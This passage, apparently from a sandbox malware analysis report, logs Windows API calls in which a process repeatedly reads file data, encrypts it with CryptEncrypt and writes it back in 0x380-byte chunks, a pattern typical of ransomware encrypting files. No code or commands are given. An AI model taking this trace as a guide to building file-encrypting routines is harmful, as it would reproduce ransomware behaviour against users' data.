lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.022] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.023] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.024] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.024] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.025] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.025] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.026] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.026] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.027] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.027] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.028] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.028] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.028] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.029] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.029] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.029] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.029] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.029] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.030] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.031] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.031] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.031] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.031] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.032] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.032] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.032] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.032] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.032] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.032] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.033] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.033] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.033] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.033] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.033] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.034] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.034] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.034] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.034] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.034] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.034] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.035] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.035] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.035] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 